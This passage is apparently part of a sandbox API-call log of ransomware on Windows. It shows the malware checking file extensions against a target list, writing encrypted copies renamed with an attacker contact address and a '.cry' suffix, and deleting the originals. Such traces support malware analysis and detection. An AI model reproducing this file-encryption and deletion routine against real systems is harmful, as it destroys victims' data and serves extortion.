lstrlenW (lpString=".1cd") returned 4 [0042.603] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0042.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.603] lstrlenW (lpString=".jpg") returned 4 [0042.603] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.604] lstrlenW (lpString=".doc") returned 4 [0042.604] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString=".docx") returned 5 [0042.604] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0042.604] lstrlenW (lpString=".pdf") returned 4 [0042.604] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString=".xls") returned 4 [0042.604] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString=".xlsx") returned 5 [0042.604] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0042.604] lstrlenW (lpString=".ppt") returned 4 [0042.604] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.604] lstrlenW (lpString=".zip") returned 4 [0042.604] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0042.604] lstrlenW (lpString=".rar") returned 4 [0042.604] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString=".bz2") returned 4 [0042.604] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString=".7z") returned 3 [0042.604] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0042.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.604] lstrlenW (lpString=".dbf") returned 4 [0042.604] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.604] lstrlenW (lpString=".1cd") returned 4 [0042.604] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0042.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0042.604] lstrlenW (lpString=".jpg") returned 4 [0042.604] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0042.605] lstrcmpiW (lpString1=".TXT", lpString2=".cry") returned 1 [0042.605] lstrlenW (lpString="METCONV.TXT") returned 11 [0042.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.605] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1183416) returned 1 [0042.605] CloseHandle (hObject=0x1f0) returned 1 [0042.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 0x20 [0042.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.606] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.606] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0042.606] GetLastError () returned 0x0 [0042.606] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0042.835] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0043.026] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x20ec8, lpOverlapped=0x0) returned 1 [0043.042] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x20ed0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x20ed0, lpOverlapped=0x0) returned 1 [0043.051] ReadFile (in: hFile=0x1f0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.051] WriteFile (in: hFile=0x1f4, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.051] SetEndOfFile (hFile=0x1f4) returned 1 [0043.052] CloseHandle (hObject=0x1f4) returned 1 [0043.062] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.062] SetEndOfFile (hFile=0x1f0) returned 1 [0043.063] CloseHandle (hObject=0x1f0) returned 1 [0043.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0043.064] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 1 [0043.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.064] lstrlenW (lpString=".doc") returned 4 [0043.064] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0043.064] lstrlenW (lpString=".docx") returned 5 [0043.064] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0043.064] lstrlenW (lpString=".pdf") returned 4 [0043.064] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0043.064] lstrlenW (lpString=".xls") returned 4 [0043.064] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0043.064] lstrlenW (lpString=".xlsx") returned 5 [0043.064] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0043.064] lstrlenW (lpString=".ppt") returned 4 [0043.064] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0043.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.064] lstrlenW (lpString=".zip") returned 4 [0043.064] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0043.064] lstrlenW (lpString=".rar") returned 4 [0043.064] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0043.064] lstrlenW (lpString=".bz2") returned 4 [0043.065] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString=".7z") returned 3 [0043.065] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0043.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.065] lstrlenW (lpString=".dbf") returned 4 [0043.065] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.065] lstrlenW (lpString=".1cd") returned 4 [0043.065] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.065] lstrlenW (lpString=".jpg") returned 4 [0043.065] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.065] lstrlenW (lpString=".doc") returned 4 [0043.065] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString=".docx") returned 5 [0043.065] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0043.065] lstrlenW (lpString=".pdf") returned 4 [0043.065] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString=".xls") returned 4 [0043.065] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0043.065] lstrlenW (lpString=".xlsx") returned 5 [0043.065] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0043.065] lstrlenW (lpString=".ppt") returned 4 [0043.065] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.065] lstrlenW (lpString=".zip") returned 4 [0043.065] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0043.065] lstrlenW (lpString=".rar") returned 4 [0043.065] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString=".bz2") returned 4 [0043.065] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0043.065] lstrlenW (lpString=".7z") returned 3 [0043.065] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0043.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.065] lstrlenW (lpString=".dbf") returned 4 [0043.065] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0043.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.066] lstrlenW (lpString=".1cd") returned 4 [0043.066] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0043.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.066] lstrlenW (lpString=".jpg") returned 4 [0043.066] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0043.066] lstrcmpiW (lpString1=".jpg", lpString2=".cry") returned 1 [0043.066] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0043.066] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0043.891] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=6406) returned 1 [0043.891] CloseHandle (hObject=0x1f0) returned 1 [0043.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0043.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.892] lstrlenW (lpString=".doc") returned 4 [0043.892] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.892] lstrlenW (lpString=".docx") returned 5 [0043.892] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0043.892] lstrlenW (lpString=".pdf") returned 4 [0043.892] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.892] lstrlenW (lpString=".xls") returned 4 [0043.892] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.892] lstrlenW (lpString=".xlsx") returned 5 [0043.892] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0043.892] lstrlenW (lpString=".ppt") returned 4 [0043.892] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.892] lstrlenW (lpString=".zip") returned 4 [0043.892] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.892] lstrlenW (lpString=".rar") returned 4 [0043.892] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.892] lstrlenW (lpString=".bz2") returned 4 [0043.892] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.892] lstrlenW (lpString=".7z") returned 3 [0043.892] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.893] lstrlenW (lpString=".dbf") returned 4 [0043.893] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.893] lstrlenW (lpString=".1cd") returned 4 [0043.893] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.893] lstrlenW (lpString=".jpg") returned 4 [0043.893] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.893] lstrlenW (lpString=".doc") returned 4 [0043.893] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.893] lstrlenW (lpString=".docx") returned 5 [0043.893] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0043.893] lstrlenW (lpString=".pdf") returned 4 [0043.893] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.893] lstrlenW (lpString=".xls") returned 4 [0043.893] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.893] lstrlenW (lpString=".xlsx") returned 5 [0043.893] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0043.893] lstrlenW (lpString=".ppt") returned 4 [0043.893] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.893] lstrlenW (lpString=".zip") returned 4 [0043.893] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.893] lstrlenW (lpString=".rar") returned 4 [0043.893] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.893] lstrlenW (lpString=".bz2") returned 4 [0043.893] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.893] lstrlenW (lpString=".7z") returned 3 [0043.893] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.894] lstrlenW (lpString=".dbf") returned 4 [0043.894] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.894] lstrlenW (lpString=".1cd") returned 4 [0043.894] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0043.894] lstrlenW (lpString=".jpg") returned 4 [0043.894] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.894] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0043.894] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0044.268] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=19780) returned 1 [0044.269] CloseHandle (hObject=0x1f4) returned 1 [0044.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 0x20 [0044.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0044.269] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.269] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0044.269] GetLastError () returned 0x0 [0044.269] ReadFile (in: hFile=0x1f4, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x4d44, lpOverlapped=0x0) returned 1 [0044.282] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x4d50, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4d50, lpOverlapped=0x0) returned 1 [0044.283] ReadFile (in: hFile=0x1f4, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.283] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.284] SetEndOfFile (hFile=0x184) returned 1 [0044.284] CloseHandle (hObject=0x184) returned 1 [0044.284] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.284] SetEndOfFile (hFile=0x1f4) returned 1 [0044.285] CloseHandle (hObject=0x1f4) returned 1 [0044.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.285] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 1 [0044.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.285] lstrlenW (lpString=".doc") returned 4 [0044.285] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.285] lstrlenW (lpString=".docx") returned 5 [0044.285] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.285] lstrlenW (lpString=".pdf") returned 4 [0044.285] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.285] lstrlenW (lpString=".xls") returned 4 [0044.285] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.285] lstrlenW (lpString=".xlsx") returned 5 [0044.285] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.285] lstrlenW (lpString=".ppt") returned 4 [0044.285] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.285] lstrlenW (lpString=".zip") returned 4 [0044.285] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.285] lstrlenW (lpString=".rar") returned 4 [0044.286] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.286] lstrlenW (lpString=".bz2") returned 4 [0044.286] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.286] lstrlenW (lpString=".7z") returned 3 [0044.286] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.286] lstrlenW (lpString=".dbf") returned 4 [0044.286] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.286] lstrlenW (lpString=".1cd") returned 4 [0044.286] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.286] lstrlenW (lpString=".jpg") returned 4 [0044.286] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.286] lstrlenW (lpString=".doc") returned 4 [0044.286] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.286] lstrlenW (lpString=".docx") returned 5 [0044.286] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.286] lstrlenW (lpString=".pdf") returned 4 [0044.286] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.286] lstrlenW (lpString=".xls") returned 4 [0044.286] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.290] lstrlenW (lpString=".xlsx") returned 5 [0044.290] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.290] lstrlenW (lpString=".ppt") returned 4 [0044.290] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.294] lstrlenW (lpString=".zip") returned 4 [0044.295] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.298] lstrlenW (lpString=".rar") returned 4 [0044.298] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.298] lstrlenW (lpString=".bz2") returned 4 [0044.298] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.298] lstrlenW (lpString=".7z") returned 3 [0044.298] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.298] lstrlenW (lpString=".dbf") returned 4 [0044.300] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.300] lstrlenW (lpString=".1cd") returned 4 [0044.303] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 